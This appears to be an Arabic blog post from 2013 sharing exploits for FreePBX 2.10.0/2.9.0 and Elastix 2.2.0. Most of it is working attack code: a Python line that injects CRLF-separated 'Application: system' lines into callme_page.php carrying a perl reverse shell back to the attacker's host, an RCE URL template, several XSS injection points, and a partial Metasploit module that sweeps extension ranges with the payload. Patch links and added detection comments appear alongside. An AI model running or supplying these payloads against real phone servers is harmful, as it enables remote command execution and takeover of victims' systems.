الخميس، 1 أغسطس 2013
4:57 ص

آخر ثغرات لل FreePBX 2.10.0, 2.9.0 / Elastix 2.2.0


السلام عليكم ورحمة الله وبركاته

إخواني الكرام، الموضوع باختصار هو عن آخر الثغرات الموجودة في الفري بي بي إكس والإلاستكس

FreePBX 2.10.0 / Elastix 2.2.0

وهي آخر الثغرات الموجودة لهذه الأنواع ولا يوجد بعدها




 # Reverse shell payload

# Builds the GET URL for the /recordings/misc/callme_page.php endpoint.
# The callmenum value is not just an extension number: after
# "<extension>@from-internal/n" it embeds URL-encoded CR/LF pairs (%0D%0A)
# followed by an "Application: system" line and a "Data:" line, so the
# parameter is used to inject additional lines into whatever the page
# forwards it to (presumably the server treats them as further command
# lines; confirm against the patched callme_page.php linked below).
# The Data line carries a URL-encoded perl one-liner that opens a socket
# back to lhost:lport (PeerAddr is built from those two values).
# Defender note: a legitimate callmenum is numeric only, so any request
# in which this parameter contains %0D%0A (or raw CR/LF) is a reliable
# detection signature for this injection; the unofficial patches for
# callme_page.php and voicemail.module referenced further down are the
# stated mitigation for the tested version.
# rhost, extension, lhost and lport are assumed to be defined earlier in
# the script — not visible in this excerpt.
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
  Unofficial Patch (RCE, tested with 2.9.0):
 
Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC

Proof of Concept:
 
RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
 
XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]
[HOST]/recordings/index.php?login='>[XSS]
 
 
'Platform'       => ['unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'       => 1024,
                    'DisableNops' => true,
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', { }]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 20 2012'))
 
        register_options(
            [
                OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
            ], self.class)
    end
 
    # Entry point of the module: walks the EXTENSION range and sends one GET
    # request per extension to /recordings/misc/callme_page.php, with the
    # URL-encoded payload embedded in the callmenum parameter after
    # %0D%0A-separated "Application: system" / "Data:" lines. The enclosing
    # class, and the initialize/register_options call that declares the
    # EXTENSION option, are outside this excerpt.
    #
    # Defender note: a legitimate callmenum value is a plain extension
    # number, so a request whose callmenum carries %0D%0A (or raw CR/LF) is
    # a reliable detection signature for this request shape; the unofficial
    # patches for callme_page.php and voicemail.module referenced above are
    # the mitigation named on this page.
    def exploit
        # Check range input: EXTENSION must match "<min>-<max>" (digits only);
        # any other value prints an error and aborts the run.
        if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
            min = $1.to_i
            max = $2.to_i
        else
            print_error("Please specify a range for option 'EXTENSION'")
            return
        end
 
        # URL-encode the generated command so it survives the query string.
        cmd = Rex::Text.uri_encode(payload.encoded)
 
        # One fresh HTTP connection per extension: connect, send the request,
        # hand control to the payload handler, then disconnect. The response
        # is captured in `res` but never inspected, so a non-vulnerable host
        # is not distinguished from a vulnerable one here.
        (min..max).each do |e|
            connect
            print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
            res = send_request_raw({
                'method' => 'GET',
                'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
                'version' => '1.0',  # HTTP/1.0 request
                'vhost'   => rhost   # Host header set to the target address
            })
            handler
            disconnect
        end
    end
 
end
